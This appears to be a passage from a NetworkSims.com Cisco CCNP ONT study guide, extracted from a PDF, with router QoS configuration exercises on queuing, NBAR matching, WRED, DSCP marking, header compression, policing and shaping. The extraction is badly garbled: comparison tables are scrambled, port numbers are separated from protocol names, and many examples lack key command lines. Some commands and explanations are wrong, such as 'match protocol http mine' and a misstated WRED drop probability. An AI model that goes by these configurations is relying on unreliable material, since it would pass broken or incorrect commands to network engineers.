(config)# int e0

Outline
Objectives

Example
> en
# config t
(config-cmap)# exit
percent
NetworkSims.com
813
remaining
(config-pmap-c)# bandwidth percent ?

<1-100> Percentage <cr>
(config-pmap-c)# bandwidth percent 50
(config-pmap)# exit
(config)# int e0

Outline
Objectives

Example
> en
# config t
(config-cmap)# exit
(config-pmap-c)# priority ?
percent
% of total bandwidth
(config-pmap-c)# priority 100
(config-pmap)# exit
(config)# int e0
The main differences between the bandwidth and priority commands are:
bandwidth Command
Maximum bandwidth guarantee
Minimum bandwidth guarantee
NetworkSims.com
Yes
No
814
Built-in policer
Provides low latency
No
No
priority Command
Built-in policer
Yes
Yes
Yes
Yes

Outline
Objectives

Example
> en
# config t
(config-cmap)# exit
(config-pmap-c)# priority ?
percent
% of total bandwidth
(config-pmap-c)# priority percent 50
(config-pmap)# exit
(config)# int e0
The main differences between the bandwidth and priority commands are:
bandwidth Command
NetworkSims.com
815

Built-in policer
Yes
No
No
No
priority Command
Built-in policer
Yes
Yes
Yes
Yes

Outline
This challenge involves the configuration of QoS for different class-maps.
Objectives
Define access-lists for class-maps.
Example
> en
# config t
(config-cmap)# exit
(config)# class-map DATA
(config-cmap)# exit
(config-pmap)# class DATA
(config-pmap)# exit
(config)# int e0
NetworkSims.com
816
In this case 60% of the bandwidth will be allocated to VoIP traffic, and 40% to HTTP traffic.
To recap the difference between the bandwidth and priority commands are:
bandwidth Command
Built-in policer
Yes
No
No
No
priority Command
Built-in policer
Yes
Yes
Yes
Yes

Outline
This challenge involves the configuration of NBAR, which can be used to define interesting
protocols.
Objectives
Define NBAR parameters.
Example
> en
# config t
(config)# ip nbar pdlm tftp://1.2.3.4/test.pdlm
(config)# ip nbar port-map http tcp 80 8080
(config)# ip nbar port-map ftp tcp 21
(config)# int s0
(config-if)# ip nbar protocol-discovery
Router# sh ip nbar port
port-map bgp
port-map bgp
port-map citrix
port-map citrix
port-map cuseeme
NetworkSims.com
udp
tcp
udp
tcp
udp
179
179
1604
1494
7648 7649 24032
817
port-map cuseeme
port-map custom-01
port-map custom-01
port-map custom-02
port-map custom-02
port-map custom-03
port-map custom-03
port-map custom-04
port-map custom-04
port-map custom-05
port-map custom-05
port-map custom-06
port-map custom-06
port-map custom-07
port-map custom-07
port-map custom-08
port-map custom-08
port-map custom-09
port-map custom-09
port-map custom-10
port-map custom-10
port-map dhcp
port-map dns
port-map dns
port-map exchange
port-map fasttrack
port-map finger
port-map ftp
port-map gnutella
port-map gopher
port-map gopher
port-map http
port-map imap
port-map imap
port-map irc
port-map irc
port-map kerberos
port-map kerberos
port-map l2tp
port-map ldap
port-map ldap
port-map napster
4444 5555
port-map netbios
port-map netbios
port-map netshow
port-map nfs
port-map nfs
port-map nntp
port-map nntp
port-map notes
port-map notes
port-map novadigm
port-map novadigm
port-map ntp
port-map ntp
port-map pcanywhere
NetworkSims.com
tcp 7648 7649

udp 0
tcp 0
udp 0
tcp 0
udp 0
tcp 0
udp 0
tcp 0
udp 0
tcp 0
udp 0
tcp 0
udp 0
tcp 0
udp 0
tcp 0
udp 0
tcp 0
udp 0
tcp 0
udp 67 68
udp 53
tcp 53
tcp 135
tcp 1214
tcp 79
tcp 21
tcp 6346 6347 6348 6349 6355 5634
udp 70
tcp 70
tcp 80
udp 143 220
tcp 143 220
udp 194
tcp 194
udp 88 749
tcp 88 749
udp 1701
udp 389
tcp 389
tcp 6699 8875 8888 7777 6700 6666 6677 6688
udp
tcp
tcp
udp
tcp
udp
tcp
udp
tcp
udp
tcp
udp
tcp
udp
137 138
137 139
1755
2049
2049
119
119
1352
1352
3460 3461 3462 3463 3464 3465
3460 3461 3462 3463 3464 3465
123
123
22 5632
818
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
port-map
pcanywhere
pop3
pop3
pptp
printer
printer
rcmd
rip
rsvp
rtspplayer
secure-ftp
secure-http
secure-imap
secure-imap
secure-irc
secure-irc
secure-ldap
secure-ldap
secure-nntp
secure-nntp
secure-pop3
secure-pop3
secure-telnet
smtp
snmp
snmp
socks
sqlnet
sqlserver
ssh
streamwork
sunrpc
sunrpc
syslog
telnet
tftp
vdolive
xwindows
tcp
udp
tcp
tcp
udp
tcp
tcp
udp
udp
tcp
tcp
tcp
udp
tcp
udp
tcp
udp
tcp
udp
tcp
udp
tcp
tcp
tcp
udp
tcp
tcp
tcp
tcp
tcp
udp
udp
tcp
udp
tcp
udp
tcp
tcp
65301 5631
110
110
1723
515
515
512 513 514
520
1698 1699
554 7070
990
443
585 993
585 993
994
994
636
636
563
563
995
995
992
25
161 162
161 162
1080
1521
1433
22
1558
111
111
514
23
69
7000
6000 6001 6002 6003

Outline
This challenge involves the configuration of NBAR, and limit bandwidth for various
protocols.
Objectives
Define NBAR parameters.

Define a traffic queue.
NetworkSims.com
819
Example
> en
# config t
(config)# ip nbar pdlm tftp://1.2.3.4/test.pdlm
(config)# ip nbar port-map http tcp 80 8080
(config)# ip nbar port-map ftp tcp 21
(config)# class-map cTest
(config-cmap)#
(config-cmap)#
(config-cmap)#
(config-cmap)#
match protocol http

match protocol ftp
match protocol telnet
exit
(config)# policy-map pTest

(config-pmap)# class cTest
(config-pmap)# exit
(config)# int s0
(config-if)# ip nbar protocol-discovery
This example a traffic queue of 512kbps is assigned for HTTP, FTP and TELNET traffic.

Outline
This challenge involves matching for URL details.
Objectives
Define match for URL
Example
> en
# config t
(config-cmap)# m pro http ?
host Server Host Name
mime Match MIME Type
url
Match URL String
<cr>
(config-cmap)# m pro http url ?
WORD Enter a string as the sub-protocol parameter
(config-cmap)# match protocol http url edinburgh*
(config-cmap)# exit

NetworkSims.com
820
(config-pmap)# exit
(config)# int s0
(config-if)# service-policy output pTest
This matches any URL with edinburgh, such as http://edinburghnights.com,

http://tourist.com/edinburgh, and so on. The matching characters are:
*
?
|
(|)
[]
Match zero or more characters

Match one character
Or
Match one choice in the parenthesis such as (gif | jpeg)
Match in a range, such as jpeg[0-9]

Outline
This challenge involves matching for HTTP host details.
Objectives
Define match for URL host.
Example
> en
# config t
(config-cmap)# m pro http host ?
(config-cmap)# match protocol http host cisco*
(config-cmap)# exit

(config-pmap)# exit
(config)# int s0
This matches any host with cisco, such as cisco.com, and so on. The matching characters are:
*
?

Match one character
NetworkSims.com
821
|
(|)
[]
Or

Outline
This challenge involves dropping packets which match a URL MIME details.
Objectives
Define match for URL MIME types.
Example
> en
# config t
(config-cmap)# m pro http mime ?
(config-cmap)# match protocol http mine *jpeg
(config-cmap)# exit

(config-pmap)# exit
(config)# int s0
This matches any MIME type of jpeg. Other typical MIME types are gif, mp3, avi, and so on.
The matching characters are:
*
?
|
(|)
[]

Match one character
Or

Outline
NetworkSims.com
822
This challenge involves dropping packets which match URL details.

Objectives
Define match for URL.
Example
> en
# config t
(config-cmap)# m pro http ?
host Server Host Name
mime Match MIME Type
url
Match URL String
<cr>
(config-cmap)# m pro http url ?
(config-cmap)# match protocol http url edinburgh*
(config-cmap)# exit

(config-pmap-c)# ?
bandwidth
Bandwidth
compression
Activate Compression
drop
Drop all packets
exit
no
police
Police
priority
queue-limit
random-detect
set
Set QoS values
shape
Traffic Shaping
(config-pmap-c)# drop
(config-pmap)# exit
(config)# int s0

Outline
This challenge involves dropping packets which match HTTP host details.
NetworkSims.com
823
Objectives
Define match for URL host.
Example
> en
# config t
(config-cmap)# m pro http host ?
(config-cmap)# match protocol http host cisco*
(config-cmap)# exit

(config-pmap)# exit
(config)# int s0
This matches any host with cisco, such as cisco.com, and so on. The matching characters are:
*
?
|
(|)
[]

Match one character
Or

Outline
This challenge involves dropping packets which match URL MIME details.
Objectives
Define match for URL MIME types.
Example
> en
NetworkSims.com
824
# config t
(config-cmap)# m pro http mime ?
(config-cmap)# match protocol http mine *jpeg
(config-cmap)# exit

(config-pmap)# exit
(config)# int s0

Outline
This challenge involves dropping packets which use the Fasttrack protocol (such as for
KaZaA, Morpheus and Grokster)
Objectives
Define match for Fasttrack file-transfer.

Define the Drop action.
Example
> en
# config t
Router(config-cmap)# match protocol ?
arp
IP ARP
bgp
Border Gateway Protocol
bridge
Bridging
bstun
Block Serial Tunnel
cdp
citrix
Citrix Traffic
cuseeme
CU-SeeMe desktop video conference
custom-01
custom-02
custom-03
custom-04
custom-05
custom-06
custom-07
custom-08
custom-09
custom-10
dhcp
Dynamic Host Configuration
NetworkSims.com
825
dlsw
dns
egp
eigrp
exchange
fasttrack
finger
ftp
gnutella
gopher
gre
http
icmp
imap
ip
ipinip
ipsec
ipv6
irc
kazaa2
kerberos
l2tp
ldap
llc2
napster
netbios
netshow
nfs
nntp
notes
novadigm
ntp
pad
pcanywhere
pop3
pppoe
pptp
printer
qllc
rcmd
rip
rsrb
rsvp
rtp
rtspplayer
secure-ftp
secure-http
secure-imap
secure-irc
secure-ldap
secure-nntp
secure-pop3
secure-telnet
smtp
snapshot
snmp
socks
sqlnet
sqlserver
ssh
streamwork
stun
sunrpc

Domain Name Server lookup
Exterior Gateway Protocol
Enhanced Interior Gateway Routing Protocol
MS-RPC for Exchange
FastTrack Traffic - KaZaA, Morpheus, Grokster...
Finger
Gnutella Traffic - BearShare,LimeWire,Gnotella...
Gopher
Generic Routing Encapsulation
World Wide Web traffic
Internet Control Message
IP
IP in IP (encapsulation)
IP Security Protocol (ESP/AH)
IPV6
Internet Relay Chat
Kazaa Version 2
Kerberos
L2F/L2TP tunnel
llc2
Napster Traffic
NetBIOS
Microsoft Netshow
Network File System
Lotus Notes(R)
Novadigm EDM
Network Time Protocol
PAD links
Symantec pcANYWHERE
Post Office Protocol
PPP over Ethernet
Point-to-Point Tunneling Protocol
print spooler/lpd
qllc protocol
BSD r-commands (rsh, rlogin, rexec)
Routing Information Protocol
Resource Reservation Protocol
Real Time Protocol
RTSP players streaming protocol
FTP over TLS/SSL
Secured HTTP
Internet Message Access Protocol over TLS/SSL
Internet Relay Chat over TLS/SSL
Lightweight Directory Access Protocol over TLS/SSL
Network News Transfer Protocol over TLS/SSL
Post Office Protocol over TLS/SSL
Telnet over TLS/SSL
SOCKS
SQL*NET for Oracle
MS SQL Server
Secured Shell
Xing Technology StreamWorks player
Serial Tunnel
Sun RPC
NetworkSims.com
826
syslog
System Logging Utility
telnet
Telnet
tftp
vdolive
VDOLive streaming video
vofr
voice over Frame Relay packets
xwindows
X-Windows remote access
(config-cmap)# match protocol fast ?
file-transfer File transfer stream
<cr>
(config-cmap)# match protocol fast file-transfer ?
(config-cmap)# match protocol fasttrack file-transfer *
(config-cmap)# exit

(config-pmap)# exit
(config)# int s0
Notes
Fasttrack matches traffic such as KaZaA, Morpheus, Grokster. It is also possible to apply
other known peer-to-peer protocols such as:
(config-cmap)# match protocol napster
(config-cmap)# match protocol kazaa2
(config-cmap)# match protocol gnutella

Outline
This challenge involves the configuration of QoS for RTP audio and video.
Objectives
Define QoS for RRP audio and video.
Example
> en
# config t
(config)# class-map AUDIO
(config-cmap)# match protocol rtp ?
NetworkSims.com
827
audio
Match voice packets
payload-type Match an explicit PT
video
Match video packets
<cr>
(config-cmap)# match protocol rtp audio ?
<cr>
(config-cmap)# match protocol rtp payload- ?
(config-cmap)# match protocol rtp video ?
<cr>
(config-cmap)# match protocol rtp audio
(config-cmap)# exit
(config)# class-map VIDEO
(config-cmap)# match protocol rtp video
(config-cmap)# exit
(config-pmap)# class AUDIO
(config-pmap)# class VIDEO
(config-pmap)# exit
(config)# int e0
Cisco ONT Test Unit 1

Unit 1: Cisco VoIP Implementations
Key facts
Unit 1: Cisco VoIP Implementations
VoIP has the following benefits:
Improved productivity.
Access to new types of communication devices.
Lower transmission costs.
Consolidated costs.
More efficent use of bandwith/equipment.
The components of VoIP include:
IP phone.
Gateways.
Multipoint control units.
Application servers.
Gatekeepers.
NetworkSims.com
828
Call agents.
Video-end points.
Not available on this version.

Key facts
Unit 2: IP Quality of Service

Key facts
Unit 3: Classification, Marking and NBAR

NetworkSims.com
829
Outline
This challenge involves the configuration of Weighted Fair Queue (WFQ).
Objectives
Define WFQ CDT parameter.

Define WFQ RDQ parameter.
Define Hold-queue size.
Example
> en
# config t
(config)# int s0
(config-if)# fair-queue ?
<1-4096> Congestive Discard Threshold
<cr>
(config-if)# fair-queue 1 ?
<16-4096> Number Dynamic Conversation Queues
<cr>
(config-if)# fair-queue 1 16 ?
<0-1000> Number Reservable Conversation Queues
<cr>
(config-if)# fair-queue 1 16 100
(config-if)# hold-time ?
<0-4096> Queue length
(config-if)# hold-time 100 ?
in
Input queue
out Output queue
(config-if)# hold-time 100 out ?
<cr>
(config-if)# hold-time 100 out ?
Default are:
Congestive discard threshold 64 messages
Dynamic queues
256 queues
Reservable queues
0 queues
NetworkSims.com
830

Outline
This challenge involves the configuration of Class-based Weighted Fair Queue (CBWFQ).
Objectives
Define CBWFQ.
Example
> en
# config t
(config-cmap)# exit
(config-cmap)# exit
(config-pmap-c)# fair-queue 16
(config-pmap)# exit
(config)# int e0
Default are:
Congestive discard threshold 64 messages
NetworkSims.com
831
Dynamic queues
Reservable queues
256 queues
0 queues

Outline
Objectives
Define CBWFQ.
Example
> en
# config t
(config-cmap)# exit
(config-cmap)# exit
(config-pmap)# exit
(config)# int e0
NetworkSims.com
832

Outline
Objectives
Define CBWFQ.
Example
> en
# config t
(config-cmap)# exit
(config-cmap)# exit
percent
remaining
(config-pmap-c)# bandwidth r ?
percent % of the remaining bandwidth
(config-pmap-c)# bandwidth remaining percent 60
(config-pmap-c)# bandwidth remaining percent 40
(config-pmap)# exit
NetworkSims.com
833
(config)# int e0

Outline
This challenge involves the configuration of Low-Latency Queue (LLQ).
Objectives
Define LLQ
Example
> en
# config t
(config-cmap)# exit
(config-cmap)# exit
(config-pmap-c)# priority 50
(config-pmap)# exit
(config)# int e0

NetworkSims.com
834
Outline
This challenge involves the configuration of Weighted RR (WRR).
Objectives
Enable QoS globally (mls qos).

Define Layer 3 operation (no switchport).
Define WRR.
Example
> en
# config t
(config)# mls qos
(config)# int fa0/1
(config-if)# mls ?
(config-if)# mls qos ?
cos
dscp-mutation Apply DSCP-DSCP map to DSCP trusted port
monitor
trust
(config-if)# mls qos trust ?
cos
device
dscp
ip-precedence Classify by packet IP precedence
<cr>
(config-if)# wrr-queue ?
bandwidth
Configure WRR bandwidth
cos-map
Configure cos-map for a queue id
min-reserve Configure min-reserve level
NetworkSims.com
835
(config-if)# wrr-queue bandwidth ANY ?

(config-if)# wrr-queue bandwidth ANY ANY ?
(config-if)# wrr-queue bandwidth ANY ANY ANY ?
(config-if)# wrr-queue cos-map ?
<1-4> enter cos-map queue id
(config-if)# wrr-queue cos-map 1 ?
<0-7> 8 cos values separated by spaces
(config-if)# wrr-queue cos-map 1 0 1 2 4

Outline
This challenge involves the configuration of PQ.
Objectives
Define PQ.
Apply priority-list onto an interface.
Example
> en
# config t
default
interface
protocol
(config)# priority-list 1 queue-limit ?
<0-32767> High limit
(config)# priority-list 1 queue-limit 10 ?
<0-32767> Medium limit
NetworkSims.com
836
(config)# priority-list 1 queue-limit 10 20 ?

<0-32767> Normal limit
(config)# priority-list 1 queue-limit 10 20 30 ?
<0-32767> Lower limit
(config)# priority-list 1 queue-limit 10 20 30 40
(config)# int e0

Key facts
Unit 4: Congestion Management and Queuing

Outline
This challenge involves the configuration of CBWRED
> CCNP ONT Area: Unit 5: Congestion Avoidance, Policing, Shaping and Link Efficiency
Mechanisms
Objectives
Define CBWRED
Example
> en
# config t
NetworkSims.com
837

access-group
Access group
any
Any packets
class-map
Class map
cos
discard-class
dscp
fr-de
fr-dlci
Match on fr-dlci
input-interface
ip
IP specific values
mpls
not
packet
precedence
protocol
Protocol
qos-group
Qos-group
source-address
Source address
(config-cmap)# match ip ?
dscp
precedence Match IP precedence
rtp
Match RTP port nos
(config-cmap)# match ip p ?
<0-7>
Enter up to 4 precedence values separated by white-spaces
critical
Match packets with critical precedence (5)
flash
Match packets with flash precedence (3)
flash-override Match packets with flash override precedence (4)
immediate
Match packets with immediate precedence (2)
internet
Match packets with internetwork control precedence (6)
network
Match packets with network control precedence (7)
priority
Match packets with priority precedence (1)
routine
Match packets with routine precedence (0)
(config-cmap)# match ip precedence 3 4
(config-cmap)# exit
(config-cmap)# match ip precedence 1 2
(config-cmap)# exit
(config-pmap-c)# random-detect ?
dscp
parameters for each dscp value
dscp-based
Enable dscp-based WRED as drop policy
exponential-weighting-constant weight for mean queue depth calculation
prec-based
Enable precedence-based WRED as drop policy
precedence
parameters for each precedence value
<cr>
(config-pmap-c)# random-detect
(config-pmap-c)# random-detect prece ?
<0-7> IP precedence
rsvp
rsvp traffic
(config-pmap-c)# random-detect prece 3 ?
<1-4096> minimum threshold (number of packets)
(config-pmap-c)# random-detect prece ANY ANY ?
<1-4096> maximum threshold (number of packets)
(config-pmap-c)# random-detect prece 10 20 30 ?
<1-65535> mark probability denominator
<cr>
NetworkSims.com
838
(config-pmap-c)# random-detect prece 10 20 30

(config-pmap)# exit
(config)# int e0
This is CBWRED (Class-based Weighted Random Early Detection), where:
Minimum threshold. When the queue is less than this value, no packets are dropped.
Maximum threshold. When then the queue is greater than this value, all packets are
dropped.
Mark Probability Denominator. When the queue is between the minimum and
maximum threshold values, the packets are dropped based on this probability.
Thus:
Will not drop until there is a queue of 10, and will always drop when the queue is over 30.
In-between 10 and 20, it will drop 30% of packets.

Outline
This challenge involves the configuration of CBWRED (DSCP-based)
Mechanisms
Objectives
Define CBWRED using DSCP.
See the next challenge for tagging the traffic with the DSCP value.
NetworkSims.com
839
Example
> en
# config t
access-group
Access group
any
Any packets
class-map
Class map
cos
discard-class
dscp
fr-de
fr-dlci
Match on fr-dlci
input-interface
ip
IP specific values
mpls
not
packet
precedence
protocol
Protocol
qos-group
Qos-group
source-address
Source address
(config-cmap)# match ip ?
dscp
precedence Match IP precedence
rtp
Match RTP port nos
(config-cmap)# match ip dscp ?
<0-63>
Differentiated services codepoint value
af11
Match packets with AF11 dscp (001010)
af12
af13
af21
af22
af23
af31
af32
af33
af41
af42
af43
cs1
Match packets with CS1(precedence 1) dscp (001000)
cs2
cs3
cs4
cs5
cs6
cs7
default Match packets with default dscp (000000)
ef
Match packets with EF dscp (101110)
(config-cmap)# match ip dscp af21 af22 af23 cs2
(config-cmap)# exit
(config-cmap)# match ip ip dscp af11 af12 a13 cs1
(config-cmap)# exit
(config-pmap-c)# random-detect ?
dscp
dscp-based
NetworkSims.com
parameters for each dscp value

Enable dscp-based WRED as drop policy
840
exponential-weighting-constant weight for mean queue depth calculation

prec-based
Enable precedence-based WRED as drop policy
precedence
parameters for each precedence value
<cr>
(config-pmap-c)# random-detect dscp ?
<0-63>
af11
af12
af13
af21
af22
af23
af31
af32
af33
af41
af42
af43
cs1
cs2
cs3
cs4
cs5
cs6
cs7
ef
rsvp
rsvp traffic
(config-pmap-c)# random-detect dscp af21 10 ?
<1-4096> minimum threshold (number of packets)
(config-pmap-c)# random-detect dscp af21 10 20 ?
<1-4096> maximum threshold (number of packets)
(config-pmap-c)# random-detect dscp af21 10 20 30 ?
<1-65535> mark probability denominator
<cr>
(config-pmap-c)# random-detect dscp cs2 10 20 30 ?
(config-pmap-c)# random-detect dscp-based
(config-pmap)# exit
(config)# int e0
This is CBWRED (Class-based Weighted Random Early Detection), where:
Minimum threshold. When the queue is less than this value, no packets are dropped.
NetworkSims.com
841
Maximum threshold. When then the queue is greater than this value, all packets are
dropped.
Mark Probability Denominator. When the queue is between the minimum and
maximum threshold values, the packets are dropped based on this probability.
Thus:
Will not drop until there is a queue of 10, and will always drop when the queue is over 30.
In-between 10 and 20, it will drop 30% of packets.

Outline
This challenge involves tagging traffic with the DSCP value.
Mechanisms
Objectives
Identify traffic, and tag.
Example
> en
# config t
(config-cmap)# exit
(config-cmap)# exit
(config-pmap-c)# set ?
atm-clp
Set ATM CLP bit to 1
cos
Set IEEE 802.1Q/ISL class of service/user priority
discard-class Discard behavior identifier
NetworkSims.com
842
dscp
Set DSCP in IP(v4) and IPv6 packets
fr-de
Set FR DE bit to 1
ip
Set IP specific values
mpls
Set MPLS specific values
precedence
Set precedence in IP(v4) and IPv6 packets
qos-group
Set QoS Group
(config-pmap-c)# set ip ?
dscp
Set IP DSCP (DiffServ CodePoint)
precedence Set IP precedence
(config-pmap-c)# set ip dscp ?
<0-63>
af11
af12
af13
af21
af22
af23
af31
af32
af33
af41
af42
af43
cs1
cs2
cs3
cs4
cs5
cs6
cs7
ef
(config-pmap-c)# set ip dscp 46
(config-pmap-c)# set ip dscp 10
(config-pmap)# exit
(config)# int e0
Note it is also possible to define:

(config-pmap-c)# set ip dscp EF
(config-pmap-c)# set ip dscp AF1
which is the same as above.

For end-to-end QoS, the tagging is done at the first router which connects to the source of
the traffic. In this way, all the devices on the way will read the DSCP tag, and route with the
required QoS.

NetworkSims.com
843
Outline
This challenge involves tagging traffic with the Precedence value.
Mechanisms
Objectives
Identify traffic, and tag.
Example
> en
# config t
(config-cmap)# exit
(config-cmap)# exit
(config-pmap-c)# set ?
atm-clp
Set ATM CLP bit to 1
cos
Set IEEE 802.1Q/ISL class of service/user priority
discard-class Discard behavior identifier
dscp
Set DSCP in IP(v4) and IPv6 packets
fr-de
Set FR DE bit to 1
ip
Set IP specific values
mpls
Set MPLS specific values
precedence
Set precedence in IP(v4) and IPv6 packets
qos-group
Set QoS Group
(config-pmap-c)# set ip ?
dscp
Set IP DSCP (DiffServ CodePoint)
precedence Set IP precedence
(config-pmap-c)# set ip prec ?
<0-7>
IP precedence
<0-7>
Precedence value
critical
Set packets with critical precedence (5)
flash
Set packets with flash precedence (3)
flash-override Set packets with flash override precedence (4)
immediate
Set packets with immediate precedence (2)
internet
Set packets with internetwork control precedence (6)
network
Set packets with network control precedence (7)
NetworkSims.com
844
priority
Set packets with priority precedence (1)
routine
Set packets with routine precedence (0)
(config-pmap-c)# set ip prec 5
(config-pmap-c)# set ip prec 1
(config-pmap)# exit
(config)# int e0
Note it is also possible to define:

(config-pmap-c)# set ip dscp critical
(config-pmap-c)# set ip dscp priority
which is the same as above.

For end-to-end QoS, the tagging is done at the first router which connects to the source of
the traffic. In this way, all the devices on the way will read the DSCP tag, and route with the
required QoS.

Outline
This challenge involves compression the RTP header for a serial interface.
Mechanisms
Objectives
Define RTP header compression.
Example
> en
# config t
(config)# int e0
(config-if)# ip ?
access-group
NetworkSims.com
845
accounting
address
audit
auth-proxy
authentication
bandwidth-percent
broadcast-address
cef
cgmp
Enable/disable CGMP
dhcp
dvmrp
flow
NetFlow related commands
header-compression IPHC options
hello-interval
helper-address
hold-time
idle-group
Specify interesting packets for idle-timer
igmp
information-reply
Enable sending ICMP Information Reply messages
inspect
Apply inspect name
irdp
load-sharing
local-proxy-arp
mask-reply
mobile
Mobile IP support
mrm
mroute-cache
mtu
multicast
nat
nbar
Network-Based Application Recognition
next-hop-self
Configures IP-EIGRP next-hop-self
nhrp
ospf
pgm
pim
policy
proxy-arp
Enable proxy ARP
rarp-server
redirects
rgmp
Enable/disable RGMP
rip
route-cache
router
IP router interface commands
rsvp
RSVP Interface Commands
rtp
RTP parameters
sap
Session Announcement Protocol interface commands
security
split-horizon
summary-address
tcp
TCP header compression and other parameters
unnumbered
unreachables
urd
verify
vrf
wccp
(config-if)# ip rtp ?
compression-connections Maximum number of compressed connections
header-compression
Enable RTP header compression
priority
Assign a priority queue for RTP streams
reserve
Assign a reserved queue for RTP streams
NetworkSims.com
846
(config-if)# ip rtp header-compression

(config-if)# ip rtp compression-connections ?
<3-1000> Number of connections
(config-if)# ip rtp compression-connections 20

Outline
This challenge involves compression the RTP header for a frame relay connection.
Mechanisms
Objectives
Define RTP header compression for a frame-relay connection.
Example
> en
# config t
(config)# int s0
(config-if)# encapsulate ?
atm-dxi
hdlc
lapb
LAPB (X.25 Level 2)
ppp
smds
x25
X.25
(config-if)# encapsulate frame-relay
1200
2400
4800
9600
14400
19200
28800
32000
38400
56000
57600
64000
72000
NetworkSims.com
847
115200
125000
128000
148000
192000
250000
256000
384000
500000
512000
768000
800000
1000000
1300000
2000000
4000000
8000000
<300-4000000>
accounting
Special accounting instruction
address-reg
ELMI address registration
broadcast-queue
class
congestion-management Enable Frame Relay congestion management
de-group
fragment
Enable end-to-end fragmentation for all PVCs
fragmentation
Adaptive fragmentation
ifmib-counter64
Support IF-MIB's total packet/byte counts of Counter64
on FR if/subif when main interface's ifSpeed < 20 Mbps
interface-dlci
interface-queue
configure PVC interface queueing
intf-type
inverse-arp
Enable/disable FR inverse ARP
ip
lmi-n391dte
lmi-n392dce
LMI error threshold
lmi-n392dte
LMI error threshold
lmi-n393dce
lmi-n393dte
lmi-t392dce
lmi-type
local-dlci
map
multicast-dlci
policing
Enable Frame Relay policing
priority-dlci-group
qos-autosense
route
traffic-shaping
traps-maximum
bridge Bridging
bstun
Block Serial Tunnel
dlsw
ip
IP
ipv6
IPV6
llc2
llc2
pppoe
PPP over Ethernet
qllc
qllc protocol
NetworkSims.com
848
rsrb
stun

Serial Tunnel

<16-1007> DLCI
broadcast
cisco
compress
ietf
nocompress
rtp
tcp
<cr>
(config-if)# frame-relay map ip 1.2.3.4 111 broadcast ?
cisco
compress
ietf
nocompress
rtp
tcp
<cr>
(config-if)# frame-relay map ip 1.2.3.4 111 broadcast rtp ?
header-compression Enable RTP/IP compression
(config-if)# frame-relay map ip 1.2.3.4 111 broadcast rtp header-compression ?
active
Always compress RTP headers
connections Maximum number of compressed RTP connections
passive
Compress for destinations sending compressed RTP headers
<cr>
(config-if)# frame-relay map ip 1.2.3.4 111 b r header-compression

Outline
This challenge involves compression the TCP header for an Ethernet interface.
Mechanisms
Objectives
Define TCP header compression.
NetworkSims.com
849
Example
> en
# config t
(config)# int e0
(config-if)# ip tcp ?
adjust-mss
Adjust the mss of transit packets
header-compression
Enable TCP header compression
(config-if)# ip tcp header-compression
(config-if)# ip tcp compression-connections ?
(config-if)# ip tcp compression-connections 20
(config-if)# ip tcp header-compression

Outline
This challenge involves multilink PPP (MLP) and Link Fragmentation (LFI).
Mechanisms
Objectives
Define a Dialer group.

Define MLP and LFI.
Apply to the BRI interface.
Example
> en
# config t
(config-if)# ppp ?
accm
accounting
Set PPP network accounting method
acfc
authorization
Set PPP network authorization method
bridge
NetworkSims.com
850
caller
chap
direction
dnis
eap
encrypt
ipcp
iphc
lcp
link
loopback
max-bad-auth
max-configure
Caller option when no CLID is available

Override default PPP direction
Authentication via DNIS before LCP
Set EAP authentication parameters
Enable PPP encryption
Set IPCP Header Compression control options
PPP loopback options
Number of conf-reqs sent before assuming peer is unable to
respond
max-failure
Number of conf-naks sent before assuming configuration is not
converging
max-terminate
Number of term-reqs sent before assuming peer is unable to
respond
ms-chap
Set MS-CHAP authentication parameters
ms-chap-v2
Set MS-CHAP-V2 authentication parameters
multilink
pap
pfc
quality
Set parameters related to Link Quality Monitoring (LQM)
reliable-link
timeout
Router(config-if)# ppp authe ?
chap
eap
Extensible Authentication Protocol (EAP)
ms-chap
Microsoft Challenge Handshake Authentication Protocol (MS-CHAP)
ms-chap-v2 Microsoft CHAP Version 2 (MS-CHAP-V2)
pap
(config-if)# ppp multilink
(config-if)# ppp multilink ?
bap
Enable BACP/BAP bandwidth allocation negotiation
fragment-delay Specify the maximum delay for each fragment
fragmentation
Enable/Disable multilink fragmentation
idle-link
Do not transmit fragments over the lowest speed link
interleave
Allow interleaving of small packets with fragments
<cr> (config-if)# ppp multilink
(config-if)# ppp multilink interleave
(config-if)# ppp mu fragment-delay ?
<1-1000> Maximum delay in milliseconds
(config-if)# ppp multilink fragment-delay 20
(config-if)# exit
(config)# int bri0
NetworkSims.com
851

Outline
This challenge involves the policing of VoIP traffic for average bit rate and burst parameters.
Objectives
Define an ACL for VoIP (SIP).

Example
> en
# config t
(config-cmap)# exit
<8000-2000000000> Bits per second
cir
<1000-512000000> Burst bytes
bc
Conform burst
conform-action
pir
<cr>
(config-pmap-c)# police 1000 5000 ?
<1000-512000000> Maximum burst bytes
conform-action
action when rate is less than normal burst
<cr>
(config-pmap-c)# police 1000 5000 9000
(config-pmap-c-police)# ?
QoS Class Police configuration commands:
conform-action action when rate is less than conform burst
exceed-action
action when rate is within conform and conform + exceed burst
exit
Exit from Police configuration mode
no
violate-action action when rate is greater than conform + exceed burst
(config-pmap)# exit
(config)# int e0
NetworkSims.com
852
In this example the traffic flow is policed for an average rate of 1000 bits per second, a
normal burst size of 5000 bytes, and an excess burst size of 9000.

Outline
This challenge involves the traffic shaping.
Objectives
Define traffic-shaping on an interface.
Example
> en
# config t
(config)# int s0
(config-if)# traffic-shape ?
adaptive
Enable Traffic Shaping adaptation to BECN
fecn-adapt Enable Traffic Shaping reflection of FECN as BECN
group
configure token bucket: group <access-list> CIR (bps) [Bc (bits)
[Be (bits)]]
rate
configure token bucket: CIR (bps) [Bc (bits) [Be (bits)]]
(config-if)# traffic-shape rate ?
<8000-100000000> Target Bit Rate (bits per second)
(config-if)# traffic-shape rate 100 ?
<0-100000000> bits per interval, sustained
<cr>
(config-if)# traffic-shape rate 100 200 ?
<0-100000000> bits per interval, excess in first interval
<cr>
(config-if)# traffic-shape rate 100 200 300 ?
<0-4096> Set buffer limit
<cr>
(config-if)# traffic-shape rate 100 200 300
(config-if)# exit
(config)# int s1
adaptive
group
[Be (bits)]]
rate
(config-if)# traffic-shape rate ?
NetworkSims.com
853
(config-if)# traffic-shape rate 100 ?

<cr>
(config-if)# traffic-shape rate 100 200 ?
<0-100000000> bits per interval, excess in first interval
<cr>
(config-if)# traffic-shape rate 100 200 300 ?
<0-4096> Set buffer limit
